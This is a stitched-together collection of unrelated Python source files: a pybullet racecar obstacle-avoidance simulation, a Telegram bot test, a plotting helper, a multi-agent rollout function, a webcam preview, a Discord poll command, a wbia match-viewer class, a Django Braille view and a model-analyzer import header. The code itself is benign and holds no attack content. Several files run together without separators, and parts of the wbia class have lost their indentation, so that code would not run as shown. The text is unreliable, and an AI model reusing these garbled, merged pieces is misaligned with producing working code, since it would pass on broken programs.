            # Prune branches already narrower than the best gap found.
            if data.compareGap(clipped_lo, clipped_hi):
                __addNextRow(row + 1, clipped_lo, clipped_hi, data)


def find_largest_gap(collisions):
    """Return the centre column of the widest gap open on every row of
    ``collisions`` (entries < 0 mean a ray hit nothing), or None when no
    column range is open across all rows."""
    open_mask = collisions < 0  # true where gap exists
    # Pad each row with closed cells so every open run has two edges.
    padded = np.pad(open_mask, pad_width=((0, 0), (1, 1)), mode='constant',
                    constant_values=0)
    edges = np.nonzero(np.diff(padded))
    rows = edges[0][0::2]
    data = __Data(rows, edges[1][0::2], edges[1][1::2], len(np.unique(rows)))
    __addNextRow(0, 0, np.inf, data)
    best = data.gap
    if best is None or best[1] == np.inf:
        return None
    return (best[0] + best[1]) / 2
#########---------------END Obstacle Avoidance----------########
#########---------------START Random Obstacles----------########
def random_environment(blocks, r):
    """Scatter ``blocks`` cubes at distinct integer grid positions within
    ``[-r, r]`` on each axis, skipping a 2-unit clearing around the origin.

    Relies on module globals: ``p`` (pybullet), ``cube`` (collision shape id)
    and ``orn`` (base orientation quaternion).
    """
    coords = list(range(-r, 1)) + list(range(1, r + 1))
    grid_x, grid_y = np.meshgrid(coords, coords)
    shuffled = np.random.permutation(grid_x.size)
    xs = grid_x.flatten()[shuffled]
    ys = grid_y.flatten()[shuffled]
    for k in range(blocks):
        position = [xs[k], ys[k], 0]
        # Keep the immediate area around the car spawn free of obstacles.
        if all(abs(c) < 2 for c in position):
            continue
        p.createMultiBody(0, cube, baseOrientation=orn, basePosition=position)
#########---------------END Random Obstacles----------########
# Main experiment loop: repeatedly builds a random obstacle field, drives the
# racecar with the ray-based gap-finding avoidance, and logs one CSV row per
# episode.  Runs forever (no exit condition on the outer loop).
with open('rc_output.csv', 'w+') as f:
    writer = csv.writer(f, quoting=csv.QUOTE_NONNUMERIC)
    writer.writerow( ('Distance Travelled', 'Radial DIstance', 'Deadend', 'Blocks', 'Radius') )
    while True:
        # Reuse a shared-memory physics server when available, else headless.
        cid = p.connect(p.SHARED_MEMORY)
        if (cid<0):
            # p.connect(p.GUI)
            p.connect(p.DIRECT)
        p.setPhysicsEngineParameter(numSolverIterations=5, fixedTimeStep=1.,
                                    numSubSteps=50)
        p.resetSimulation()
        p.setGravity(0,0,-10)
        useRealTimeSim = False
        # Concave cube mesh used for every obstacle (global read by
        # random_environment).
        cube = p.createCollisionShape(p.GEOM_MESH, fileName=os.path.join(pybullet_data.getDataPath(), "cube.obj"), flags=p.GEOM_FORCE_CONCAVE_TRIMESH, meshScale=[1, 1, 1])
        orn = p.getQuaternionFromEuler([0,0,0])
        radius = 10    # episode ends once the car travels this far radially
        blocks = 125   # number of obstacle cubes to scatter
        random_environment(blocks, radius)
        p.setRealTimeSimulation(useRealTimeSim)  # either this
        p.loadURDF(os.path.join(pybullet_data.getDataPath(),"plane.urdf"))
        car = p.loadURDF(os.path.join(pybullet_data.getDataPath(),"racecar/racecar.urdf"))
        # Racecar joint layout: 2,3 drive wheels; 4,6 steering; 5,7 free.
        inactive_wheels = [5,7]
        wheels = [2,3]
        for wheel in inactive_wheels:
            p.setJointMotorControl2(car,wheel,p.VELOCITY_CONTROL,targetVelocity=0,force=0)
        steering = [4,6]
        # Debug sliders (only useful in GUI mode; values are hard-coded below).
        targetVelocitySlider = p.addUserDebugParameter("wheelVelocity",-10,10,0)
        maxForceSlider = p.addUserDebugParameter("maxForce",0,10,10)
        steeringSlider = p.addUserDebugParameter("steering",-0.5,0.5,0)
        ray_length = 2   # how far ahead each sensor ray reaches
        angle_swept = 60  # total horizontal field of view in degrees
        # Angular step chosen so one sweep fits in a single ray batch.
        step = math.ceil(100*angle_swept/p.MAX_RAY_INTERSECTION_BATCH_SIZE)/100
        angles = np.arange(-angle_swept/2, angle_swept/2, step) * np.pi / 180  # angle of rotations
        num_rays = np.shape(angles)[0]
        # Ray endpoints in the car frame (x-right, y-forward, z-up rows).
        rays = np.concatenate(([ray_length*np.sin(angles)], [ray_length*np.cos(angles)], [np.zeros(num_rays)]), axis=0)
        rot = np.array([[0, -1, 0], [1, 0, 0], [0, 0, 0]])
        offset = np.array([0, 0, 0.3])  # lift ray origin above the chassis
        count = 0
        nowhere_count = 0
        path = __Path()
        nowhere = False
        while (path.rad < radius + .5):
            # maxForce = p.readUserDebugParameter(maxForceSlider)
            # targetVelocity = p.readUserDebugParameter(targetVelocitySlider)
            # steeringAngle = p.readUserDebugParameter(steeringSlider)
            maxForce = 10.
            targetVelocity = -5
            steeringAngle = 0
            #########---------------START Obstacle Avoidance----------########
            position, orientation = p.getBasePositionAndOrientation(car)
            matrix = p.getMatrixFromQuaternion(orientation)
            matrix = np.reshape(matrix, (3, 3))
            src = np.array(position)
            src = src + np.matmul(matrix,offset)
            path.calcDist(src)
            h = 10  # number of vertical ray layers swept per step
            rays_src = np.repeat([src], num_rays, axis=0)
            orn = np.matmul(matrix, rot)  # rotates unit vector y to -x
            rays_end = np.matmul(orn, rays)  # unit vector in direction of minitaur
            rays_end = (rays_end + src[:, None]).T
            rays_info = p.rayTestBatch(rays_src.tolist(), rays_end.tolist())
            # b holds the hit object id per ray; -1 means the ray hit nothing.
            b = np.asarray([int(i[0]) for i in rays_info])
            for i in range(h-1):
                # NOTE(review): this rebinds the module-level `rays` each
                # layer (z raised by i+1); subsequent steps start from the
                # last layer's geometry.
                rays = np.concatenate(([ray_length*np.sin(angles)], [ray_length*np.cos(angles)], [np.full((num_rays,), i+1)]), axis=0)
                rays_end = np.matmul(orn, rays)  # unit vector in direction of minitaur
                rays_end = (rays_end + src[:, None]).T
                rays_info = p.rayTestBatch(rays_src.tolist(), rays_end.tolist())
                b = np.vstack((b, np.asarray([int(i[0]) for i in rays_info])))
            # Steer toward the widest obstacle-free corridor across layers.
            nth_ray = find_largest_gap(b)
            if(nth_ray == None):
                nowhere = True
                targetVelocity = 0
                # print("Nowhere")
                nowhere_count += 1
                # Give up after being boxed in for 20 consecutive steps.
                if nowhere_count > 20:
                    break
            else:
                nowhere_count = 0
                # Convert the gap's ray index into a steering angle offset.
                deg = 1.*angle_swept*nth_ray/b.shape[1] - angle_swept/2.
                # print("Rotate {:.1f} degrees".format(deg))
                if math.fabs(deg) > 5:
                    targetVelocity = -4
                    steeringAngle = np.sign(deg)*.7
            #########---------------END Obstacle Avoidance----------########
            for wheel in wheels:
                p.setJointMotorControl2(car,wheel,p.VELOCITY_CONTROL,targetVelocity=targetVelocity,force=maxForce)
            for steer in steering:
                p.setJointMotorControl2(car,steer,p.POSITION_CONTROL,targetPosition=steeringAngle)
            if (useRealTimeSim==0):
                p.stepSimulation()
            time.sleep(0.01)
            count += 1
        # One CSV row per episode: distances, whether it dead-ended, and the
        # environment parameters used.
        writer.writerow( (path.len, path.rad, nowhere, blocks, radius) )
        # print("Dist Travelled: {}\n radial: {}\n deadend: {}\n \
        #        blocks: {}\n radius: {}".format(path.len, path.rad,
        #        nowhere, blocks, radius))
        # collision, distance? mag or actual, deadend, time,
|
# coding=utf-8
from tgbot import plugintest
from plugin_examples.bold import BoldPlugin
class AdminPluginTest(plugintest.PluginTestCase):
    """Checks the inline-query results produced by BoldPlugin."""

    def setUp(self):
        self.bot = self.fake_bot('', inline_query=BoldPlugin())

    def test_inline(self):
        self.receive_inline(u'hello')
        results = self.pop_reply()[1]['results']
        expected = [
            ('Bold', '*hello*'),
            ('Italic', '_hello_'),
            ('Fixedsys', '`hello`'),
            ('Pre-Rendered', 'hello'),
        ]
        # Each formatting style should appear in order with markdown applied.
        for index, (title, message_text) in enumerate(expected):
            self.assertEqual(results[index]['title'], title)
            self.assertEqual(results[index]['message_text'], message_text)
|
'''Helper for plotting reblocking plots.'''
# copyright: (c) 2015 James Spencer
# license: modified BSD license; see LICENSE for further details.
import matplotlib.pyplot as plt
def plot_reblocking(block_info, plotfile=None, plotshow=True):
    '''Plot the reblocking data.

    Parameters
    ----------
    block_info : :class:`pandas.DataFrame`
        Reblocking data (i.e. the first item of the tuple returned by
        ``reblock``).
    plotfile : string
        If not null, save the plot to the given filename. If '-', then show
        the plot interactively. See also ``plotshow``.
    plotshow : bool
        If ``plotfile`` is not given or is '-', then show the plot
        interactively.

    Returns
    -------
    fig : :class:`matplotlib.figure.Figure`
        plot of the reblocking data.
    '''
    fig = plt.figure()
    data_sets = block_info.columns.get_level_values(0).unique()
    for (i, col) in enumerate(data_sets):
        ax = fig.add_subplot(len(data_sets), 1, i+1)
        # There should only be (at most) one non-null value for optimal
        # block.  Test the index array's *length* explicitly: `if opt:` on a
        # numpy array is ambiguous/deprecated, and after taking opt[0] a
        # legitimate optimal block at index 0 would be falsy and silently
        # skipped.
        opt_indices = block_info[
            block_info[(col, 'optimal block')] != ''].index.values
        have_opt = len(opt_indices) > 0
        opt = opt_indices[0] if have_opt else None
        std_err = block_info[(col, 'standard error')]
        if 'standard error error' in block_info[col]:
            std_err_err = block_info[(col, 'standard error error')]
        else:
            # No error-on-the-error column; draw zero-length error bars.
            std_err_err = 0*std_err
        line = ax.errorbar(block_info.index, std_err, std_err_err, marker='o',
                           label=col)
        if have_opt:
            # Arrow pointing at the optimal reblock iteration.
            ax.annotate('', (opt, std_err[opt]-std_err_err[opt]),
                        xytext=(0, -20), textcoords='offset points',
                        arrowprops=dict(
                            arrowstyle="->",
                            linewidth=1.2*line[0].get_linewidth(),
                        ),)
        ax.legend(loc=2)
        ax.set_ylabel('standard error')
        ax.set_xlabel('Reblock iteration')
    # Give each data set its own full-height panel.
    size = fig.get_size_inches()
    fig.set_size_inches(size[0], size[1]*len(data_sets))
    fig.tight_layout()
    if plotfile == '-' or (not plotfile and plotshow):
        plt.show()
    elif plotfile:
        fig.savefig(plotfile)
    return fig
|
import numpy as np
from rlkit.torch.core import eval_np
def marollout(
    env,
    agent_n,
    max_path_length=np.inf,
    render=False,
    render_kwargs=None,
    shared_obs=False,
    shared_encoder=None,
    shared_groups=None,
    collect_raw_actions=False,
):
    """
    Roll out one episode in a multi-agent environment, one policy per agent.

    The following value for the following keys will be a 2D array, with the
    first dimension corresponding to the time dimension.
     - observations
     - actions
     - rewards
     - next_observations
     - terminals

    The next two elements will be lists of dictionaries, with the index into
    the list being the index into the time
     - agent_infos
     - env_infos

    Args:
        env: multi-agent environment; ``reset()`` yields per-agent
            observations and ``step`` takes a list of per-agent actions.
        agent_n: list of policies, one per agent.
        max_path_length: stop after this many steps even if not done.
        render: if True, call ``env.render(**render_kwargs)`` each step.
        render_kwargs: dict|None. Extra kwargs forwarded to ``env.render``.
        shared_obs: if True, every agent receives the full joint observation.
        shared_encoder: optional encoder (or list of encoders when
            ``shared_groups`` is set) applied to the joint observation
            before slicing out each agent's view.
        shared_groups: optional mapping of agent index -> encoder index,
            used to pick which encoder's output an agent reads.
        collect_raw_actions: if True, also record
            ``agent_info['raw_action']`` per agent per step.

    Returns:
        dict. The collected path (see key list above); contains
        ``raw_actions`` as well when ``collect_raw_actions`` is set.
    """
    if render_kwargs is None:
        render_kwargs = {}
    num_agent = len(agent_n)
    observations = []
    actions = []
    if collect_raw_actions:
        raw_actions = []
    rewards = []
    terminals = []
    agent_infos = []
    env_infos = []
    o_n = env.reset()
    # Clear each policy's internal state before the new episode.
    [agent.reset() for agent in agent_n]
    next_o = None  # NOTE(review): unused; kept to preserve behavior.
    path_length = 0
    if render:
        env.render(**render_kwargs)
    while path_length < max_path_length:
        a_n, agent_info_n = [], {}
        if collect_raw_actions:
            ra_n = []
        if shared_encoder:
            # Encode the joint observation once per step; agents below index
            # into the embedding rather than re-encoding.
            if shared_groups:
                o_emb_n = [eval_np(sub_shared_encoder, o_n[None, :])[0] for sub_shared_encoder in shared_encoder]
            else:
                o_emb_n = eval_np(shared_encoder, o_n[None, :])[0]
        for i, agent in enumerate(agent_n):
            # Select agent i's view of the observation.
            if shared_encoder:
                if shared_groups:
                    o = o_emb_n[shared_groups[i]][i]
                else:
                    o = o_emb_n[i]
            elif shared_obs:
                o = o_n
            else:
                o = o_n[i]
            a, agent_info = agent.get_action(o)
            a_n.append(a)
            # Flatten per-agent info into one dict keyed by "<key> <agent>".
            for key in agent_info.keys():
                agent_info_n[key + ' ' + str(i)] = agent_info[key]
            if collect_raw_actions:
                ra_n.append(agent_info['raw_action'])
        next_o_n, r_n, d_n, env_info = env.step(a_n)
        observations.append(o_n)
        rewards.append(r_n)
        terminals.append(d_n)
        actions.append(a_n)
        if collect_raw_actions:
            raw_actions.append(ra_n)
        agent_infos.append(agent_info_n)
        env_infos.append(env_info)
        path_length += 1
        # Episode ends only when every agent reports done.
        if d_n.all():
            break
        o_n = next_o_n
        if render:
            env.render(**render_kwargs)
    actions = np.array(actions)
    if len(actions.shape) == 2:
        # Scalar per-agent actions: add a trailing action dimension.
        actions = np.expand_dims(actions, 2)
    if collect_raw_actions:
        raw_actions = np.array(raw_actions)
        if len(raw_actions.shape) == 2:
            raw_actions = np.expand_dims(raw_actions, 2)
    observations = np.array(observations)
    if not shared_obs:
        if len(observations.shape) == 2:
            observations = np.expand_dims(observations, 2)
        next_o_n = np.array(next_o_n)
        if len(next_o_n.shape) == 1:
            next_o_n = np.expand_dims(next_o_n, 1)
        # next_observations = observations shifted one step forward, with
        # the final post-step observation appended.
        next_observations = np.vstack(
            (
                observations[1:, :, :],
                np.expand_dims(next_o_n, 0)
            )
        )
    else:
        next_observations = np.vstack(
            (
                observations[1:, :],
                np.expand_dims(next_o_n, 0)
            )
        )
    path = dict(
        observations=observations,
        actions=actions,
        rewards=np.array(rewards).reshape(-1, num_agent, 1),
        next_observations=next_observations,
        terminals=np.array(terminals).reshape(-1, num_agent, 1),
        agent_infos=agent_infos,
        env_infos=env_infos,
    )
    if collect_raw_actions:
        path['raw_actions'] = raw_actions
    return path
# Minimal live webcam preview using OpenCV.
import cv2
import numpy as np

# Open the first webcam attached to the system (index 0);
# use cv2.VideoCapture(1) for a second webcam.
camera = cv2.VideoCapture(0)
while True:
    grabbed, frame = camera.read()
    cv2.imshow('WebCam', frame)
    # Quit the preview when the 'q' key is pressed.
    if cv2.waitKey(1) & 0xFF == ord('q'):
        break
camera.release()  # free the camera for other applications
cv2.destroyAllWindows()  # close every OpenCV window
|
import discord, sqlite3, asyncio
from discord.ext import commands
from discord_slash import cog_ext, SlashContext
from discord_slash.utils.manage_commands import create_option
class Slash(commands.Cog):
    """Slash-command cog that ends a poll stored in the local SQLite DB."""

    def __init__(self, bot):
        self.bot = bot

    @cog_ext.cog_slash(name="pollend", description="Terminer un sondage", options=[
        create_option(
            name="id_du_sondage",
            description="L'identifiant du sondage (qui est celui du sondage envoyé par le bot)",
            option_type=3,
            required=True
        )
    ])
    async def _pollend(self, ctx, id_du_sondage: str):
        """End a poll: tally reactions, edit the poll message with the
        results, and delete the poll's row from the database."""
        connection = sqlite3.connect("iso_card.db")
        cursor = connection.cursor()
        # Normalise a numeric-looking ID; non-numeric input is kept as-is.
        try:
            id_du_sondage = int(id_du_sondage)
        except:
            pass
        id_du_sondage = (f"{id_du_sondage}",)
        cursor.execute('SELECT * FROM polls WHERE message_id = ?', id_du_sondage)
        poll_values = cursor.fetchone()
        if poll_values == None:
            await ctx.send(f"{ctx.author.mention} Désolé mais le sondage que tu recherches n'a pas été retrouvé... essaie de voir si tu as entré le bon identifiant, ou si le sondage n'a pas déjà été terminé :wink:")
        else:
            # Row layout (per usage below): [0] message id, [1] channel id,
            # [2] title, [3] newline-joined option lines.
            channel_to_find = self.bot.get_channel(poll_values[1])
            try:
                msg = await channel_to_find.fetch_message(poll_values[0])
            except:
                # NOTE(review): if the fetch fails, `msg` stays unbound and
                # the loop below raises NameError — confirm intended handling.
                pass
            poll_title = poll_values[2]
            poll_arguments = poll_values[3].split("\n")
            n, bs_n, numbers = 0, "\n", ['1️⃣', '2️⃣', '3️⃣', '4️⃣', '5️⃣', '6️⃣', '7️⃣', '8️⃣', '9️⃣', '🔟']
            # Append each option's vote count, excluding the bot's own
            # seed reaction (hence the -1).
            for reaction in msg.reactions:
                poll_arguments[n] = str(poll_arguments[n]) + f" • x{int(reaction.count) - 1}"
                n += 1
            poll_arguments = bs_n.join(poll_arguments)
            embed = discord.Embed(title=f"{poll_title} (terminé)", description=ctx.author.mention)
            embed.add_field(name="** **", value=poll_arguments, inline=False)
            await msg.edit(embed=embed, content=None)
            message_id = (f"{msg.id}",)
            cursor.execute('DELETE FROM polls WHERE message_id = ?', message_id)
            connection.commit()
            # Short-lived confirmation message, deleted after one second.
            msg = await ctx.send(":white_check_mark:")
            await asyncio.sleep(1)
            await msg.delete()
        connection.close()
def setup(bot):
    # Extension entry point used by discord.py's load_extension().
    bot.add_cog(Slash(bot))
def teardown(bot):
    """Extension unload hook: detach the poll cog from the bot.

    discord.py identifies cogs by their class name ("Slash"), not by the
    slash-command name; the original ``remove_cog("pollend")`` matched no
    cog and silently left it attached.
    """
    bot.remove_cog("Slash")
# -*- coding: utf-8 -*-
"""
Unfinished non-wbia dependent version of interact matches
"""
import utool as ut
import numpy as np
from wbia.plottool import abstract_interaction
BASE_CLASS = abstract_interaction.AbstractInteraction
# TODO: move to plottool and decouple with IBEIS
# TODO: abstract interaction
@ut.reloadable_class
class MatchInteraction2(BASE_CLASS):
"""
TODO: replace functional version with this class
Plots a chip result and sets up callbacks for interaction.
SeeAlso:
wbia.viz.interact.interact_matches.MatchInteraction
CommandLine:
python -m wbia.plottool.interact_matches --test-MatchInteraction2 --show
Example:
>>> # xdoctest: +REQUIRES(module:wbia, --slow)
>>> from wbia.plottool.interact_matches import * # NOQA
>>> import wbia
>>> # build test data
>>> ibs = wbia.opendb('testdb1')
>>> qreq_ = ibs.new_query_request([1], [2, 3, 4, 5], cfgdict=dict(query_rotation_heuristic=True))
>>> cm = qreq_.execute()[0]
>>> qaid = cm.qaid
>>> daid = cm.get_top_aids()[0]
>>> rchip1 = ibs.get_annot_chips([qaid], config2_=qreq_.extern_query_config2)[0]
>>> rchip2 = ibs.get_annot_chips([daid], config2_=qreq_.extern_data_config2)[0]
>>> kpts1 = ibs.get_annot_kpts([qaid], config2_=qreq_.extern_query_config2)[0]
>>> kpts2 = ibs.get_annot_kpts([daid], config2_=qreq_.extern_data_config2)[0]
>>> vecs1 = ibs.get_annot_vecs([qaid], config2_=qreq_.extern_query_config2)[0]
>>> vecs2 = ibs.get_annot_vecs([daid], config2_=qreq_.extern_data_config2)[0]
>>> fm = cm.aid2_fm[daid]
>>> fs = cm.aid2_fs[daid]
>>> fsv = cm.aid2_fsv[daid]
>>> H1 = cm.aid2_H[daid]
>>> self = MatchInteraction2(rchip1, rchip2, kpts1, kpts2, fm, fs, fsv,
>>> vecs1, vecs2, H1)
>>> self.show_page()
>>> import wbia.plottool as pt
>>> pt.show_if_requested()
"""
    def __init__(
        self,
        rchip1,
        rchip2,
        kpts1,
        kpts2,
        fm,
        fs,
        fsv,
        vecs1,
        vecs2,
        H1=None,
        H2=None,
        fnum=None,
        **kwargs
    ):
        """Store the chips, keypoints and match data, then initialise the
        base interaction.

        Args:
            rchip1, rchip2: the two chip images being compared.
            kpts1, kpts2: keypoints of each chip (indexed by ``fm``).
            fm: feature match index pairs into kpts1/kpts2.
            fs: per-match scores.
            fsv: per-match score vectors.
            vecs1, vecs2: descriptor vectors of each chip.
            H1, H2: optional homographies applied when ``warp_homog`` is on.
            fnum: optional figure number for the secondary (detail) figure.
            **kwargs: drawing options consumed here (fk, mode, mx, vert,
                same_fig, title, truth) with the rest forwarded to
                AbstractInteraction.
        """
        import wbia.plottool as pt

        # Copy so the pops below don't mutate the caller's dict.
        kwargs = kwargs.copy()
        # Drawing Data
        self.rchip1 = rchip1
        self.rchip2 = rchip2
        self.kpts1 = kpts1
        self.kpts2 = kpts2
        self.fm = fm
        self.fs = fs
        self.fk = kwargs.pop('fk', None)
        self.fsv = fsv
        self.vecs1 = vecs1
        self.vecs2 = vecs2
        self.H1 = H1
        self.H2 = H2
        # Drawing settings
        self.warp_homog = False
        self.mode = kwargs.pop('mode', 0)
        self.mx = kwargs.pop('mx', None)
        self.vert = kwargs.pop('vert', None)
        self.same_fig = kwargs.get('same_fig', True)
        self.last_fx = 0
        # xywh2 is filled in by chipmatch_view and used for click testing.
        self.xywh2 = None
        self.fnum2 = pt.ensure_fnum(fnum)
        self.title = kwargs.get('title', True)
        self.truth = kwargs.pop('truth', None)
        kwargs['interaction_name'] = 'matches'
        super(MatchInteraction2, self).__init__(**kwargs)
    def plot(self, *args, **kwargs):
        # AbstractInteraction drawing hook: delegate to the chipmatch view.
        self.chipmatch_view(*args, **kwargs)
    def chipmatch_view(self, fnum=None, pnum=(1, 1, 1), verbose=None, **kwargs_):
        """
        Visualizes the matches between the two chips using some type of lines.

        The draw style comes from ``self.mode`` (overridable via
        ``kwargs_['mode']``): ellipses are drawn for mode >= 1 and match
        lines only for mode == 2.
        """
        import wbia.plottool as pt
        from wbia.plottool import plot_helpers as ph

        if fnum is None:
            fnum = self.fnum
        if verbose is None:
            verbose = ut.VERBOSE
        if verbose:
            print('-- CHIPMATCH VIEW --')
            print('[ichipmatch_view] self.mode = %r' % (self.mode,))
        mode = kwargs_.get('mode', self.mode)
        draw_ell = mode >= 1
        draw_lines = mode == 2
        if verbose:
            print('[ichipmatch_view] draw_lines = %r' % (draw_lines,))
            print('[ichipmatch_view] draw_ell = %r' % (draw_ell,))
        # NOTE: the figure is deliberately not cleared (doclf=False); the
        # original author flagged that clearing here might cause issues.
        pt.figure(fnum=fnum, docla=True, doclf=False)
        show_matches_kw = dict(
            draw_lines=draw_lines,
            draw_ell=draw_ell,
            colorbar_=True,
            vert=self.vert,
            white_background=False,
        )
        # Caller-supplied kwargs win over the defaults above.
        show_matches_kw.update(kwargs_)
        if verbose:
            print('self.warp_homog = %r' % (self.warp_homog,))
        if self.warp_homog:
            show_matches_kw['H1'] = self.H1
            show_matches_kw['H2'] = self.H2
        if verbose:
            print('show_matches_kw = %s' % (ut.repr2(show_matches_kw, truncate=True)))
        ax, xywh1, xywh2 = pt.show_chipmatch2(
            self.rchip1,
            self.rchip2,
            self.kpts1,
            self.kpts2,
            fm=self.fm,
            fs=self.fs,
            pnum=pnum,
            **show_matches_kw
        )
        # Remember chip-2 placement so clicks can be mapped back to it.
        self.xywh2 = xywh2
        ph.set_plotdat(ax, 'viztype', 'matches')
        if self.truth is not None and self.truth:
            truth_color = pt.TRUE_BLUE  # if else pt.FALSE_RED
            pt.draw_border(ax, color=truth_color, lw=4)
        if self.title is not None:
            pt.set_title(self.title, ax=ax)
# Draw clicked selection
    def select_ith_match(self, mx):
        """
        Selects the ith match and visualizes and prints information concerning
        features weights, keypoint details, and sift descriptions.

        Args:
            mx: index into ``self.fm`` of the feature match to select.
        """
        import wbia.plottool as pt
        from wbia.plottool import viz_featrow
        from wbia.plottool import interact_helpers as ih

        fnum = self.fnum
        same_fig = self.same_fig
        rchip1 = self.rchip1
        rchip2 = self.rchip2
        self.mx = mx
        print('+--- SELECT --- ')
        print('... selecting mx-th=%r feature match' % mx)
        fsv = self.fsv
        fs = self.fs
        print('score stats:')
        print(ut.repr2(ut.get_stats(fsv, axis=0), nl=1))
        print('fsv[mx] = %r' % (fsv[mx],))
        print('fs[mx] = %r' % (fs[mx],))
        # ----------------------
        # Get info for the select_ith_match plot
        self.mode = 1
        # Get the mx-th feature match
        fx1, fx2 = self.fm[mx]
        # Older info
        fscore2 = self.fs[mx]
        fk2 = None if self.fk is None else self.fk[mx]
        kp1, kp2 = self.kpts1[fx1], self.kpts2[fx2]
        vecs1, vecs2 = self.vecs1[fx1], self.vecs2[fx2]
        info1 = '\nquery'
        info2 = '\nk=%r fscore=%r' % (fk2, fscore2)
        self.last_fx = fx1
        # Extracted keypoints to draw: one row per chip.
        extracted_list = [
            (rchip1, kp1, vecs1, fx1, 'aid1', info1),
            (rchip2, kp2, vecs2, fx2, 'aid2', info2),
        ]
        # ----------------------
        # Draw the select_ith_match plot.  When same_fig is set, the match
        # view takes the top row of the grid and the feature rows follow.
        nRows, nCols = len(extracted_list) + same_fig, 3
        # Draw matching chips and features with the selection highlighted.
        sel_fm = np.array([(fx1, fx2)])
        pnum1 = (nRows, 1, 1) if same_fig else (1, 1, 1)
        vert = self.vert if self.vert is not None else False
        self.chipmatch_view(
            pnum=pnum1,
            ell_alpha=0.4,
            ell_linewidth=1.8,
            colors=pt.BLUE,
            sel_fm=sel_fm,
            vert=vert,
        )
        # Draw selected feature matches
        px = nCols * same_fig  # plot offset
        prevsift = None
        if not same_fig:
            # Feature rows go into the secondary figure.
            fnum2 = self.fnum2
            fig2 = pt.figure(fnum=fnum2, docla=True, doclf=True)
        else:
            fnum2 = fnum
        for (rchip, kp, sift, fx, aid, info) in extracted_list:
            px = viz_featrow.draw_feat_row(
                rchip,
                fx,
                kp,
                sift,
                fnum2,
                nRows,
                nCols,
                px,
                prevsift=prevsift,
                aid=aid,
                info=info,
            )
            prevsift = sift
        if not same_fig:
            # Clicks in the secondary figure route back to this interaction.
            ih.connect_callback(fig2, 'button_press_event', self.on_click)
# Callback
def on_click_inside(self, event, ax):
from wbia.plottool import plot_helpers as ph
(x, y) = (event.xdata, event.ydata)
viztype = ph.get_plotdat(ax, 'viztype', '')
if event.button == 3:
self.show_popup_menu(self.get_popup_options(), event)
return
# key = '' if event.key is None else event.key
# ctrl_down = key.find('control') == 0
if viztype in ['matches', 'multi_match']:
if len(self.fm) == 0:
print('[inter] no feature matches to click')
else:
# Normal Click
# Select nearest feature match to the click
kpts1_m = self.kpts1[self.fm[:, 0]]
kpts2_m = self.kpts2[self.fm[:, 1]]
x2, y2, w2, h2 = self.xywh2
import vtool as vt
_mx1, _dist1 = vt.nearest_point(x, y, kpts1_m)
_mx2, _dist2 = vt.nearest_point(x - x2, y - y2, kpts2_m)
mx = _mx1 if _dist1 < _dist2 else _mx2
print('... clicked mx=%r' % mx)
self.select_ith_match(mx)
# elif viztype in ['warped', 'unwarped']:
# pass
# #hs_aid = ax.__dict__.get('_hs_aid', None)
# #hs_fx = ax.__dict__.get('_hs_fx', None)
# #if hs_aid is not None and viztype == 'unwarped':
# # ishow_chip(ibs, hs_aid, fx=hs_fx, fnum=pt.next_fnum())
# #elif hs_aid is not None and viztype == 'warped':
# # viz.show_keypoint_gradient_orientations(ibs, hs_aid,
# # hs_fx, fnum=pt.next_fnum())
# Click in match axes
# elif viztype == 'matches' and ctrl_down:
# # Ctrl-Click
# print('.. control click')
# return self.sv_view()
elif viztype.startswith('colorbar'):
# Hack to get a specific scoring feature
sortx = self.fs.argsort()
idx = np.clip(int(np.round(y * len(sortx))), 0, len(sortx) - 1)
mx = sortx[idx]
(fx1, fx2) = self.fm[mx]
(fx1, fx2) = self.fm[mx]
print('... selected score at rank idx=%r' % (idx,))
print('... selected score with fs=%r' % (self.fs[mx],))
print('... resolved to mx=%r' % mx)
print('... fx1, fx2 = %r, %r' % (fx1, fx2))
self.select_ith_match(mx)
else:
print('...Unknown viztype: %r' % viztype)
self.draw()
def on_click_outside(self, event):
if event.button != 1:
return
print('... out of axis')
# self.warp_homog = not self.warp_homog
self.mode = (self.mode + 1) % 3
# self.chipmatch_view()
self.show_page()
self.draw()
    def get_popup_options(self):
        """Build the right-click context menu: (label, callback) pairs that
        toggle ``warp_homog`` and cycle ``mode``."""

        def toggle_attr_item(attr, num_states=2):
            # `value` is captured once when the menu item is created; the
            # callback computes the next state from that snapshot (the menu
            # is rebuilt for each click, so the snapshot stays current).
            value = getattr(self, attr)
            type_ = type(value)

            def toggle_attr():
                # Advance to the next state, preserving the attribute's type
                # (bools stay bools, ints stay ints).
                new_value = (value + 1) % (num_states)
                new_value = type_(new_value)
                print('new_value(%s) = %r' % (attr, new_value))
                setattr(self, attr, new_value)
                self.show_page()
                self.draw()

            itemstr = 'Toggle %s=%r' % (attr, value)
            return (itemstr, toggle_attr)

        options = [
            toggle_attr_item('warp_homog'),
            toggle_attr_item('mode', 3),
        ]
        return options
def show_keypoint_gradient_orientations(
    ibs, rchip, kp, vec, fnum=None, pnum=None, config2_=None
):
    """Draw the gradient vectors of a patch overlaying the keypoint.

    Args:
        ibs: controller handle (unused here; kept for interface parity).
        rchip: chip image containing the keypoint.
        kp: the keypoint to overlay.
        vec: the keypoint's descriptor vector (passed as ``sift``).
        fnum: figure number; allocated via ``pt.next_fnum()`` when None.
        pnum: plot number within the figure.
        config2_: unused config pass-through.
    """
    # Fix: the module is wbia.plottool — the original imported
    # 'wbia.plottoola', which raises ImportError on every call.
    import wbia.plottool as pt

    if fnum is None:
        fnum = pt.next_fnum()
    pt.draw_keypoint_gradient_orientations(
        rchip, kp, sift=vec, mode='vec', fnum=fnum, pnum=pnum
    )
|
from django.shortcuts import render
from .braille_translators import alphaToBraille, brailleToAlpha
def braille_viewer(request):
    """Translate a sample sentence to Braille (and back) and render it
    through the index.html template."""
    text = "This is how they see the world."
    text_braille = alphaToBraille.translate(text)
    print(text_braille)
    braille_text = brailleToAlpha.retranslate(text_braille)
    print(braille_text)
    context = {
        'range': range(len(text_braille)),
        'text': braille_text,
        'text_braille': text_braille,
    }
    return render(request, 'index.html', context)
# Powered by Braille-Translator(https://github.com/LazoCoder/Braille-Translator)
|
# Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import re
import sys
from io import TextIOWrapper
from pathlib import Path
from model_analyzer.triton.model.model_config import ModelConfig
